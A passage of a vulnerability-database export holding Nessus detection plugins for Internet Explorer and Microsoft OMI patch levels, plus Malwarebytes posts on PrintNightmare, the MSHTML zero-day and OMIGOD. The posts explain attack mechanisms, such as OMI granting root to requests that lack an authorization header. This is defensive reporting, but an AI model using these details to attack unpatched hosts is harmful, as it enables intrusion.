value:\"2021/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin = 'MS21-09';\nvar kbs = make_list(\n '5005563',\n '5005606',\n '5005613',\n '5005623',\n '5005633'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nvar os = get_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nvar productname = get_kb_item_or_exit('SMB/ProductName', exit_code:1);\nif ('Windows 8' >< productname && '8.1' >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\nif ('Vista' >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nvar share = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 8.1 / Windows Server 2012 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:'6.3', sp:0, file:'mshtml.dll', version:'11.0.9600.20120', min_version:'11.0.9600.16000', dir:'\\\\system32', bulletin:bulletin, kb:'5005563') ||\n\n # Windows Server 2012\n # Internet Explorer 11\n hotfix_is_vulnerable(os:'6.2', sp:0, file:'mshtml.dll', version:'11.0.9600.20120', min_version:'11.0.9600.16000', dir:'\\\\system32', bulletin:bulletin, kb:'5005563') ||\n\n # Windows 7 / Server 2008 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:'6.1', sp:1, file:'mshtml.dll', version:'11.0.9600.20120', min_version:'11.0.9600.16000', dir:'\\\\system32', bulletin:bulletin, kb:'5005563') ||\n\n # Windows Server 2008\n # Internet Explorer 9\n hotfix_is_vulnerable(os:'6.0', sp:2, file:'mshtml.dll', version:'9.0.8112.21591', min_version:'9.0.8112.16000', dir:'\\\\system32', bulletin:bulletin, kb:'5005563')\n)\n{\n var report = '\\nNote: The fix for this issue is available in either of the following updates:\\n';\n report += ' - KB5005563 : Cumulative Security Update for Internet Explorer\\n';\n\n if(os == '6.3')\n {\n report += ' - KB5005613 : Windows 8.1 / Server 2012 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:bulletin, kb:'5005613', report);\n }\n else if(os == '6.2')\n {\n report += ' - KB5005623 : Windows Server 2012 Monthly Rollup\\n';\n hotfix_add_report(bulletin:bulletin, kb:'5005623', report);\n }\n else if(os == '6.1')\n {\n report += ' - KB5005633 : Windows 7 / Server 2008 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:bulletin, kb:'5005633', report);\n }\n else if(os == '6.0')\n {\n report += ' - KB5005606 : Windows Server 2008 Monthly Rollup\\n';\n hotfix_add_report(bulletin:bulletin, kb:'5005606', report);\n }\n\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n\n var port = kb_smb_transport();\n\n hotfix_security_warning();\n hotfix_check_fversion_end();\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:33:52", "description": "The version of Microsoft Open Management Infrastructure (OMI) package installed on the remote host is prior to 1.6.8-1. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability exists in the OMI agent. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary commands with root privileges. (CVE-2021-38647) \n - Multiple privilege escalation vulnerabilities exists in the OMI agent. An unauthenticated, remote attacker can exploit this, to gain privileged access to the system. (CVE-2021-38645, CVE-2021-38648, CVE-2021-38649)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-09-17T00:00:00", "type": "nessus", "title": "Microsoft Open Management Infrastructure (OMI) package < 1.6.8-1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649"], "modified": "2023-02-03T00:00:00", "cpe": ["x-cpe:/a:microsoft:open_management_infrastructure"], "id": "OMI_1_6_8_1.NASL", "href": "https://www.tenable.com/plugins/nessus/153475", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153475);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/03\");\n\n script_cve_id(\n \"CVE-2021-38645\",\n \"CVE-2021-38647\",\n \"CVE-2021-38648\",\n \"CVE-2021-38649\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0433\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0044\");\n\n script_name(english:\"Microsoft Open Management Infrastructure (OMI) package < 1.6.8-1 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A package installed on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Microsoft Open Management Infrastructure (OMI) package installed on the remote host is prior to\n1.6.8-1. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability exists in the OMI agent. An unauthenticated, remote attacker can exploit \n this to bypass authentication and execute arbitrary commands with root privileges. (CVE-2021-38647)\n \n - Multiple privilege escalation vulnerabilities exists in the OMI agent. An unauthenticated, remote attacker can\n exploit this, to gain privileged access to the system. (CVE-2021-38645, CVE-2021-38648, CVE-2021-38649)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/microsoft/omi/releases\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to version 1.6.8-1 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-38647\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft OMI Management Interface Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/a:microsoft:open_management_infrastructure\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\ninclude('debian_package.inc');\ninclude('ubuntu.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar rpm_flag = 0;\n# CentOS Linux\nif (rpm_check(release:'CentOS-7', reference:'omi-1.6.8-1')) rpm_flag++;\nif (rpm_check(release:'CentOS-8', reference:'omi-1.6.8-1')) rpm_flag++;\n# Red Hat Enterprise Linux\nif (rpm_check(release:'RHEL7', reference:'omi-1.6.8-1')) rpm_flag++;\nif (rpm_check(release:'RHEL8', reference:'omi-1.6.8-1')) rpm_flag++;\n# Oracle Enterprise Linux\nif (rpm_check(release:'EL7', reference:'omi-1.6.8-1')) rpm_flag++;\nif (rpm_check(release:'EL8', reference:'omi-1.6.8-1')) rpm_flag++;\n# Amazon Linux\nif (rpm_check(release:'ALA', reference:'omi-1.6.8-1')) rpm_flag++;\nif (rpm_check(release:'AL2', reference:'omi-1.6.8-1')) rpm_flag++;\n# Fedora Core\nif (rpm_check(release:'FC33', reference:'omi-1.6.8-1')) rpm_flag++;\nif (rpm_check(release:'FC34', reference:'omi-1.6.8-1')) rpm_flag++;\n# NewStart CGSL\nif (rpm_check(release:'ZTE CGSL MAIN 4.06', reference:'omi-1.6.8-1')) rpm_flag++;\nif (rpm_check(release:'ZTE CGSL MAIN 5.04', reference:'omi-1.6.8-1')) rpm_flag++;\nif (rpm_check(release:'ZTE CGSL MAIN 6.02', reference:'omi-1.6.8-1')) rpm_flag++;\nif (rpm_check(release:'ZTE CGSL CORE 5.04', reference:'omi-1.6.8-1')) rpm_flag++;\n# Scientifix Linux\nif (rpm_check(release:'SL6', reference:'omi-1.6.8-1')) rpm_flag++;\nif (rpm_check(release:'SL7', reference:'omi-1.6.8-1')) rpm_flag++;\n# OpenSUSE\nif (rpm_check(release:'SUSE15.2', reference:'omi-1.6.8-1')) rpm_flag++;\nif (rpm_check(release:'SUSE15.3', reference:'omi-1.6.8-1')) rpm_flag++;\n# Virtuozzo\nif (rpm_check(release:'Virtuozzo-6', reference:'omi-1.6.8-1')) rpm_flag++;\nif (rpm_check(release:'Virtuozzo-7', reference:'omi-1.6.8-1')) rpm_flag++;\n\nvar deb_flag = 0;\n# Debian Linux\nif (deb_check(release:'8.0', prefix:'omi', reference:'1.6.8-1')) deb_flag++;\nif (deb_check(release:'9.0', prefix:'omi', reference:'1.6.8-1')) deb_flag++;\nif (deb_check(release:'10.0', prefix:'omi', reference:'1.6.8-1')) deb_flag++;\nif (deb_check(release:'11.0', prefix:'omi', reference:'1.6.8-1')) deb_flag++;\n\nvar ubuntu_flag = 0;\n# Ubuntu Linux\nif (ubuntu_check(osver:'14.04', pkgname:'omi', pkgver:'1.6.8-1')) ubuntu_flag++;\nif (ubuntu_check(osver:'16.04', pkgname:'omi', pkgver:'1.6.8-1')) ubuntu_flag++;\nif (ubuntu_check(osver:'18.04', pkgname:'omi', pkgver:'1.6.8-1')) ubuntu_flag++;\nif (ubuntu_check(osver:'20.04', pkgname:'omi', pkgver:'1.6.8-1')) ubuntu_flag++;\nif (ubuntu_check(osver:'21.04', pkgname:'omi', pkgver:'1.6.8-1')) ubuntu_flag++;\n\nif (rpm_flag || deb_flag || ubuntu_flag)\n{\n var extra;\n\n if (rpm_flag)\n extra = rpm_report_get();\n else if (deb_flag)\n extra = deb_report_get();\n else if (ubuntu_flag)\n extra = ubuntu_report_get();\n\n security_report_v4(\n port: 0,\n severity: SECURITY_HOLE,\n extra: extra\n );\n exit(0);\n}\nelse\n audit(AUDIT_HOST_NOT, 'affected');\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:33:40", "description": "The version of Azure Open Management Infrastructure installed on the remote host is prior to 1.6.8.1. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability exists in the OMI agent. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary commands with root privileges. (CVE-2021-38647) \n - Multiple privilege escalation vulnerabilities exists in the OMI agent. An unauthenticated, remote attacker can exploit this, to gain privileged access to the system. (CVE-2021-38645, CVE-2021-38648, CVE-2021-38649)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-09-17T00:00:00", "type": "nessus", "title": "Microsoft Open Management Infrastructure < 1.6.8.1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649"], "modified": "2023-02-03T00:00:00", "cpe": ["x-cpe:/a:microsoft:open_management_infrastructure"], "id": "AZURE_OPEN_MGMT_INFRA_1_6_8_1.NASL", "href": "https://www.tenable.com/plugins/nessus/153474", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153474);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/03\");\n\n script_cve_id(\n \"CVE-2021-38645\",\n \"CVE-2021-38647\",\n \"CVE-2021-38648\",\n \"CVE-2021-38649\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0433\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0044\");\n\n script_name(english:\"Microsoft Open Management Infrastructure < 1.6.8.1 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Azure Open Management Infrastructure server is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Azure Open Management Infrastructure installed on the remote host is prior to 1.6.8.1. It is, therefore,\naffected by multiple vulnerabilities:\n\n - A remote code execution vulnerability exists in the OMI agent. An unauthenticated, remote attacker can exploit \n this to bypass authentication and execute arbitrary commands with root privileges. (CVE-2021-38647)\n \n - Multiple privilege escalation vulnerabilities exists in the OMI agent. An unauthenticated, remote attacker can\n exploit this, to gain privileged access to the system. (CVE-2021-38645, CVE-2021-38648, CVE-2021-38649)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/Microsoft/omi/releases/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Azure Open Management Infrastructure version 1.6.8.1 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-38647\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft OMI Management Interface Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/a:microsoft:open_management_infrastructure\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_omi_nix_installed.nbin\");\n script_require_keys(\"installed_sw/omi\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nvcf::add_separator('-'); # used in parsing version for vcf\napp_info = vcf::combined_get_app_info(app:'omi');\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { 'fixed_version' : '1.6.8.1' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "malwarebytes": [{"lastseen": "2021-09-17T16:35:06", "description": "The September 2021 Patch Tuesday could be remembered as the _final_ patching attempt in the PrintNightmare\u2026 nightmare. The ease with which the vulnerabilities [shrugged off the August patches](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/microsofts-printnightmare-continues-shrugs-off-patch-tuesday-fixes/>) doesn\u2019t look to get a rerun. So far we haven\u2019t seen any indications that this patch is so easy to circumvent.\n\nThe total count of fixes for this Patch Tuesday tallies up to 86, including 26 for Microsoft Edge alone. Only a few of these vulnerabilities are listed as zero-days and two of them are "old friends". There is a third, less-likely-to-be-exploited one, and then we get to introduce a whole new set of vulnerabilities nicknamed OMIGOD, for reasons that will become obvious.\n\nAzure was the subject of five CVE\u2019s, one of them listed as critical. The four that affect the Open Management Infrastructure (OMI) were found by researchers, grouped together and received the nickname OMIGOD.\n\n### PrintNightmare\n\nPrintNightmare is the name of a set of vulnerabilities that allow a standard user on a Windows network to execute arbitrary code on an affected machine (including domain controllers) as SYSTEM, allowing them to elevate their privileges as far as domain admin. Users trigger the flaw by simply feeding a malicious printer driver to a vulnerable machine, and could use their new-found superpowers to install programs; view, change, or delete data; or create new accounts with full user rights.\n\nThe problem was made worse by significant [confusion](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/patch-now-emergency-fix-for-printnightmare-released-by-microsoft/>) about whether PrintNightmare was a known, patched problem or an entirely new problem, and by repeated, at best partially-successful, attempts to patch it.\n\nThis month, Microsoft patched the remaining Print Spooler vulnerabilities under [CVE-2021-36958](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36958>). Fingers crossed.\n\n### MSHTML\n\nThis zero-day vulnerability that felt like a ghost from the past (it involved ActiveX, remember that?) was only [found last week](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/windows-mshtml-zero-day-actively-exploited-mitigations-required/>), but has attracted significant attention. It was listed as [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>), a Remote Code Execution (RCE) vulnerability in Microsoft MSHTML. \n\nThreat actors were sharing PoCs, tutorials and exploits on hacking forums, so that every script kiddy and wannabe hacker was able to follow step-by-step instructions in order to launch their own attacks. Microsoft published mitigation instructions that disabled the installation of new ActiveX controls, but this turned out to be easy to work around for attackers.\n\nGiven the short window of opportunity, there was some doubt about whether a fix would be included in this Patch Tuesday, but it looks like Microsoft managed to pull it off.\n\n### DNS elevation of privilege vulnerability\n\nThis vulnerability was listed as [CVE-2021-36968](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36968>) and affects systems running Windows Server 2008 R2 SP1, SP2 and Windows 7 SP1. It exists due to an application that does not properly impose security restrictions in Windows DNS. The vulnerability is listed as a zero-day because it has been publicly disclosed, not because it is actively being exploited.\n\nMicrosoft says that exploitation is \u201cless likely\u201d, perhaps because it requires initial authentication and can only be exploited locally. If these conditions are met this bug can be used to accomplish elevation of privilege (EoP). \n\n### OMIGOD\n\nOMIGOD is the name for a set of four vulnerabilities in the Open Management Infrastructure (OMI) that you will find embedded in many popular Azure services. The CVEs are:\n\n * [CVE-2021-38647](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38647>) OMI RCE Vulnerability with a [CVSS score](<https://blog.malwarebytes.com/malwarebytes-news/2020/05/how-cvss-works-characterizing-and-scoring-vulnerabilities/>) of 9.8 out of 10.\n * [CVE-2021-38648](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38648>) Open Management Infrastructure Elevation of Privilege Vulnerability\n * [CVE-2021-38645](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38645>) Open Management Infrastructure Elevation of Privilege Vulnerability\n * [CVE-2021-38649](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38649>) Open Management Infrastructure Elevation of Privilege Vulnerability\n\nThe [researchers](<https://www.wiz.io/blog/secret-agent-exposes-azure-customers-to-unauthorized-code-execution>) that discovered the vulnerabilities consider OMIGOD to be a result of the supply-chain risks that come with using open-source code:\n\n> Wiz\u2019s research team recently discovered a series of alarming vulnerabilities that highlight the supply chain risk of open source code, particularly for customers of cloud computing services.\n\nOMI runs as root (the highest privilege level) and is activated within Azure when users enable certain services, like distributed logging, or other management tools and services. It's likely that many users aren't even aware they have it running.\n\nThe RCE vulnerability (CVE-2021-38647) can be exploited in situations where the OMI ports are accessible to the Internet to allow for remote management. In this configuration, any user can communicate with it using a UNIX socket or via an HTTP API, and any user can abuse it to remotely execute code or escalate privileges.\n\nA coding mistake means that any incoming request to the service _without_ an authorization header has its privileges default to uid=0, gid=0, which is root. \n \nOMIGOD, right?\n\nThe researchers report that the flaw can only be used to remotely takeover a target when OMI exposes the HTTPS management port externally. This is the default configuration when installed standalone and in Azure Configuration Management or System Center Operations Manager (SCOM). Other Azure services (such as Log Analytics) do not expose this port, so in those cases the scope is limited to local privilege escalation.\n\nThey advise all Azure customers to connect to their Azure VMs and run the commands below in their terminal to ensure OMI is updated to the latest version:\n\n * For Debian systems (e.g., Ubuntu): `dpkg -l omi`\n * For Redhat based system (e.g., Fedora, CentOS, RHEL): `rpm -qa omi`\n\nIf OMI isn\u2019t installed, the commands won't return any results, and your machine isn\u2019t vulnerable. Version 1.6.8.1 is the patched version. All earlier versions need to be patched.\n\n## Update September 17, 2021\n\nAfter a proof-of-concept exploit was published on code hosting website GitHub, attackers we re noticed to be looking for Linux servers running on Microsoft\u2019s Azure cloud infrastructure. These systems are vulnerable to the security flaw called OMIGOD.\n\nAccording to reports from security researchers the attackers use the OMIGOD exploit, to deploy malware that ensnares the hacked server into cryptomining or DDoS botnets.\n\nThe post [[updated] Patch now! PrintNightmare over, MSHTML fixed, a new horror appears \u2026 OMIGOD](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-now-printnightmare-over-mshtml-fixed-a-new-horror-appears-omigod/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-15T13:19:48", "type": "malwarebytes", "title": "[updated] Patch now! PrintNightmare over, MSHTML fixed, a new horror appears \u2026 OMIGOD", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-36958", "CVE-2021-36968", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40444"], "modified": "2021-09-15T13:19:48", "id": "MALWAREBYTES:76333D1F0FCAFD79FA2EDD4A4CAFBB38", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-now-printnightmare-over-mshtml-fixed-a-new-horror-appears-omigod/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-25T08:35:08", "description": "Malwarebytes has reason to believe that the [MSHTML vulnerability](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/windows-mshtml-zero-day-actively-exploited-mitigations-required/>) listed under [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) is being used to target Russian entities. The Malwarebytes Intelligence team has intercepted email attachments that are specifically targeting Russian organizations.\n\nThe first template we found is designed to look like an internal communication within JSC GREC Makeyev. The Joint Stock Company State Rocket Center named after Academician V.P. Makeyev is a strategic holding of the country's defense and industrial complex for both the rocket and space industry. It is also the lead developer of liquid and solid-fuel strategic missile systems with ballistic missiles, making it one of Russia's largest research and development centers for developing rocket and space technology.\n\nThe email claims to come from the Human Resources (HR) department of the organization.\n\n![HR department query](https://blog.malwarebytes.com/wp-content/uploads/2021/09/Makeyev_template-484x600.png)A phishing email targeted at the Makeyev State Rocket Center, posing at its own HR department \n\nIt says that HR is performing a check of the personal data provided by employees. The email asks employees to please fill out the form and send it to HR, or reply to the mail. When the receiver wants to fill out the form they will have to enable editing. And that action is enough to trigger the exploit.\n\nThe attack depends on MSHTML loading a specially crafted ActiveX control when the target opens a malicious Office document. The loaded ActiveX control can then run arbitrary code to infect the system with more malware.\n\nThe second attachment we found claims to originate from the Ministry of the Interior in Moscow. This type of attachment can be used to target several interesting targets.\n\n![from Russian Ministry of the Interior](https://blog.malwarebytes.com/wp-content/uploads/2021/09/Justice_template-469x600.png)A phishing email posing as the Russian Ministry of the Interior\n\nThe title of the documents translates to \u201cNotification of illegal activity.\u201d It asks the receiver to please fill out the form and return it to the Ministry of Internal affairs or reply to this email. It also urges the intended victim to do so within 7 days.\n\n### Russian targets\n\nIt is rare that we find evidence of cybercrimes against Russian targets. Given the targets, especially the first one, we suspect that there may be a state-sponsored actor behind these attacks, and we are trying to find out the origin of the attacks. We will keep you informed if we make any progress in that regard.\n\n### Patched vulnerability\n\nThe CVE-2021-40444 vulnerability may be old-school in nature (it involves ActiveX, remember that?) but it was only recently discovered. It wasn't long before threat actors were sharing PoCs, tutorials and exploits on hacking forums, so that everyone was able to follow step-by-step instructions in order to launch their own attacks.\n\nMicrosoft quickly published mitigation instructions that disabled the installation of new ActiveX controls, and managed to squeeze a [patch into its recent Patch Tuesday](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-now-printnightmare-over-mshtml-fixed-a-new-horror-appears-omigod/>) output, just a few weeks after the bug became public knowledge. However, the time it takes to create a patch is often dwarfed by the time it takes people to apply it. Organizations, especially large ones, are often found trailing far behind with applying patches, so we expect to see more attacks like this.\n\n\u0411\u0443\u0434\u044c\u0442\u0435 \u0432 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u0432\u0441\u0435!\n\nThe post [MSHTML attack targets Russian state rocket centre and interior ministry](<https://blog.malwarebytes.com/reports/2021/09/mshtml-attack-targets-russian-state-rocket-centre-and-interior-ministry/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-22T19:16:56", "type": "malwarebytes", "title": "MSHTML attack targets Russian state rocket centre and interior ministry", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-22T19:16:56", "id": "MALWAREBYTES:801E20618F96EF51F9E60F7BC7906C2B", "href": "https://blog.malwarebytes.com/reports/2021/09/mshtml-attack-targets-russian-state-rocket-centre-and-interior-ministry/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-13T12:35:29", "description": "Several researchers have independently reported a 0-day remote code execution vulnerability in MSHTML to Microsoft. The reason it was reported by several researchers probably lies in the fact that a limited number of attacks using this vulnerability have been identified, as per Microsoft\u2019s [security update](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>). \n\n> Microsoft is aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents.\n\nMSHTML is a software component used to render web pages on Windows. Although it's most commonly associated with Internet Explorer, it is also used in other software including versions of Skype, Microsoft Outlook, Visual Studio, and others.\n\nMalwarebytes, as shown lower in this article, blocks the related malicious powershell code execution.\n\n### CVE-2021-40444\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). This one has been assigned the designation [CVE-2021-40444](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40444>) and received a CVSS score of 8.8 out of 10. The CVSS standards are used to help security researchers, software users, and vulnerability tracking organizations measure and report on the severity of vulnerabilities. CVSS can also help security teams and developers prioritize threats and allocate resources effectively.\n\nThe Cybersecurity and Infrastructure Security Agency took to Twitter to [encourage](<https://twitter.com/USCERT_gov/status/1435342618704191491>) users and organizations to review Microsoft's mitigations and workarounds to address CVE-2021-40444.\n\n### 